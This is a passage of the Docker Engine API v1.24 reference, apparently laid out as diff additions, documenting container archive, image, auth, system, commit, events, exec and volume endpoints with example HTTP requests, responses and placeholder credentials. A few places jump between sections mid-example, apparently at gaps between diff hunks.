If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.24/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. 
+ +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.24/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. 
+- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 3.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.24/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.24/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. 
In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label + - `before`=(`[:]`, `` or ``) + - `since`=(`[:]`, `` or ``) +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.24/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. 
After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. 
Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. +- **labels** – JSON map of string pairs for labels to set on the image. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.24/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... 
+ +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." 
+ } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.24/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : 
"91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.24/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": 
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}
+ } + ``` + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.24/images/test/tag?repo=myrepo&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.24/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.24/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... 
+ ] + +**Query parameters**: + +- **term** – term to search +- **limit** – maximum returned search results +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `stars=` + - `is-automated=(true|false)` + - `is-official=(true|false)` + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 3.3 Misc + +#### Check auth configuration + +`POST /auth` + +Validate credentials for a registry and get identity token, +if available, for accessing the registry without password. + +**Example request**: + + POST /v1.24/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + + { + "Status": "Login Succeeded", + "IdentityToken": "9cbaf023786cd7..." + } + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.24/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "CgroupDriver": "cgroupfs", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelMemory": true, + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + 
], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SecurityOptions": [ + "apparmor", + "seccomp", + "selinux" + ], + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.24/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.12.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.6.3", + "GitCommit": "deadbee", + "Arch": "amd64", + "ApiVersion": "1.24", + "BuildTime": "2016-06-14T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.24/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.24/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", 
+ "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. 
+The Docker daemon reports the following event:
"7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": 
+  - `container=<string>`; -- container to filter
+  - `event=<string>`; -- event to filter
+  - `image=<string>`; -- image to filter
+  - `label=<string>`; -- image and container label to filter
+  - `type=<string>`; -- either `container` or `image` or `volume` or `network` or `daemon`
+  - `volume=<string>`; -- volume to filter
+  - `network=<string>`; -- network to filter
+  - `daemon=<string>`; -- daemon name or id to filter
+ +**Example request** + + GET /v1.24/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.24/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. 
+ +**Example request** + + POST /v1.24/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[= ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[== ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[=== ] 98.3 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[===== ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"} + ... + {"stream":"Loaded image: busybox:latest\n"} + +**Example response**: + +If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress +details are suppressed, and only a confirmation message is returned once the +action completes. + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"stream":"Loaded image: busybox:latest\n"} + +**Query parameters**: + +- **quiet** – Boolean value, suppress progress details during load. Defaults + to `0` / `false` if omitted. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. 
+- **DetachKeys** – Override the key sequence for detaching a
+  container. Format is a single character `[a-Z]` or `ctrl-<value>`
+  where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.24/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.24/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.24/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 3.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.24/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis", + "Labels": null, + "Scope": "local" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. Available filters: + - `name=` Matches all or part of a volume name. + - `dangling=` When set to `true` (or `1`), returns all volumes that are "dangling" (not in use by a container). When set to `false` (or `0`), only volumes that are in use by one or more containers are returned. + - `driver=` Matches all or part of a volume driver name. 
+Refer to the [inspect a volume](#inspect-a-volume) section for details about the
+JSON fields returned in the response.
+ +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /v1.24/volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "custom", + "Mountpoint": "/var/lib/docker/volumes/tardis/_data", + "Status": { + "hello": "world" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + }, + "Scope": "local" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +**JSON fields in response**: + +The following fields can be returned in the API response. Empty fields, or +fields that are not supported by the volume's driver may be omitted in the +response. + +- **Name** - Name of the volume. +- **Driver** - Name of the volume driver used by the volume. +- **Mountpoint** - Mount path of the volume on the host. +- **Status** - Low-level details about the volume, provided by the volume driver. + Details are returned as a map with key/value pairs: `{"key":"value","key2":"value2"}`. + The `Status` field is optional, and is omitted if the volume driver does not + support this feature. +- **Labels** - Labels set on the volume, specified as a map: `{"key":"value","key2":"value2"}`. +- **Scope** - Scope describes the level at which the volume exists, can be one of + `global` for cluster-wide or `local` for machine level. The default is `local`. + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). 
